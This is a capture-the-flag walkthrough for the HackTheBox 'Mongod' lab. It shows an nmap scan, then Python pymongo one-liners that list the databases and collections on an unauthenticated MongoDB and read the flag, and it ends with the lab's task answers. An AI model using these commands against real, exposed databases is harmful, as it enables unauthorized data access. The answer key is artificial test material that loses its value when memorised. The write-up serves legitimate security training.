HackTheBox Starting Point Tier 0 Mongod

Video Walkthrough

Writeup

nmap <IP> -p27017 -sC
Nmap scan showing port 27017 open (MongoDB)
MongoDB nmap scan results 
python3 -m venv venv && source venv/bin/activate && pip install pymongo==3.12.3
Installing pymongo 3.12.3
Installing pymongo 3.12.3 
python3 -c "from pymongo import MongoClient; client = MongoClient('mongodb://<IP>'); print('Databases:\n'); [print(db) for db in client.list_database_names()]"
Listing MongoDB databases
MongoDB list databases output 
python3 -c "from pymongo import MongoClient; print('Collections:\n' + '\n'.join(MongoClient('mongodb://<IP>').sensitive_information.list_collection_names()))"
Listing MongoDB collections
MongoDB list collections output 
python3 -c "from pymongo import MongoClient; print(MongoClient('mongodb://<IP>').sensitive_information['flag'].find_one())"
Retrieving the flag from the database
MongoDB flag output

Tasks

  1. 2
  2. MongoDB 3.6.8
  3. NoSQL
  4. mongosh
  5. show dbs
  6. show collections
  7. db.flag.find()